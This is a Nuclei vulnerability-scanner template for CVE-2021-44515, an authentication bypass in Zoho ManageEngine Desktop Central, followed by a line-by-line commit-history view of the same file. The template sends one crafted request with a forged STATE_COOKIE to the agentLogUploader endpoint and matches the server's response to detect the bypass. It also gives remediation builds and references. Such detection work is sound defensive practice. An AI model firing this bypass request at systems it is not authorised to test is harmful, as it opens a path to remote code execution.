nuclei-templates/http/cves/2021/CVE-2021-44515.yaml

id: CVE-2021-44515

info:
  name: Zoho ManageEngine Desktop Central - Remote Code Execution
  author: Adam Crosser
  severity: critical
  description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
  reference:
    - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
    - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
    - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
    - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44515
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-44515
    cwe-id: CWE-287
    epss-score: 0.97233
    epss-percentile: 0.99811
    cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: manageengine_desktop_central
  tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp

http:
  - raw:
      - |
        GET /STATE_ID/123/agentLogUploader HTTP/1.1
        Host: {{Hostname}}
        Cookie: STATE_COOKIE=&_REQS/_TIME/123

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body) == 0"

      - type: word
        part: header
        words:
          - "UEMJSESSIONID="

      - type: status
        status:
          - 200
# digest: 490a00463044022068d48f3ed1b18a18f6d8a7aab9d329d2ef1ab59ae7975558fcc658030c86758602202beae5f2b5f2ef43937f43f3cbf3feb749df245d2e841fa8df5963b2c96ae819:922c64590222798bb761d5b6d8e72950
Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142) * Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-24 10:12:25 +00:00			`id: CVE-2021-44515`

			`info:`
			`name: Zoho ManageEngine Desktop Central - Remote Code Execution`
			`author: Adam Crosser`
			`severity: critical`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.`
Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142) * Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-24 10:12:25 +00:00			`reference:`
			`- https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog`
			`- https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html`
			`- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-44515`
Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142) * Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-24 10:12:25 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142) * Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-24 10:12:25 +00:00			`cve-id: CVE-2021-44515`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cwe-id: CWE-287`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.97233`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`epss-percentile: 0.99811`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:::::enterprise:::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: zohocorp`
			`product: manageengine_desktop_central`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp`
Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142) * Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-24 10:12:25 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Zoho Desktop Central Authentication Bypass Vulnerability (CVE-2021-44515) (#4142) * Added Template for CVE-2021-44515 * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * Update bigip-config-utility-detect.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-24 10:12:25 +00:00			`- raw:`
			`- \|`
			`GET /STATE_ID/123/agentLogUploader HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: STATE_COOKIE=&_REQS/_TIME/123`

			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "len(body) == 0"`

			`- type: word`
			`part: header`
			`words:`
Dashboard Content Enhancements (#4426) Dashboard Content Enhancements 2022-05-18 20:58:07 +00:00			`- "UEMJSESSIONID="`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Tue Jan 30 06:46:18 UTC 2024] :robot: 2024-01-30 06:46:18 +00:00			`# digest: 490a00463044022068d48f3ed1b18a18f6d8a7aab9d329d2ef1ab59ae7975558fcc658030c86758602202beae5f2b5f2ef43937f43f3cbf3feb749df245d2e841fa8df5963b2c96ae819:922c64590222798bb761d5b6d8e72950`